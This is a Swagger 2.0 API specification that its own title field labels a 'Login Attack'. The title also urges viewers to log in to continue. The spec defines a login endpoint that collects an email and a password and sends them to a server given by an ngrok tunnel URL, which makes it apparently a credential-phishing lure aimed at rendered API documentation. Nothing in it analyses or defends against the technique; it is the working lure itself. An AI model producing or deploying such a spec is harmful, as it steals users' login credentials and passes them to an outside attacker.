swagger: "2.0"
info:
  title: /*Login Attack BY M0X0101*/ Hello user plese make login blow to contaniue thanks
  description: An API that allows users to log in to a web application and send data to a server IP address
  version: "1.0"

basePath: /api

schemes:
  - https
  - http

paths:
  /login:
    post:
      summary: Logs a user in to the web application and sends data to a server IP address
      consumes:
        - application/json
      produces:
        - application/json
      parameters:
        - name: email
          in: body
          description: The email address of the user
          required: true
          schema:
            type: string
        - name: password
          in: body
          description: The password of the user
          required: true
          schema:
            type: string
        - name: server_ip
          in: body
          description: The IP address of the server to which data will be sent
          required: true
          schema:
            type: string
            example: https://9eff-174-138-64-216.ngrok.io
      responses:
        200:
          description: Successful login and data sent to server
          schema:
            type: object
            properties:
              token:
                type: string
                description: An authentication token that can be used for subsequent requests
              message:
                type: string
                description: A success message indicating that data has been sent to the server
        400:
          description: Invalid login credentials or missing server IP address
  
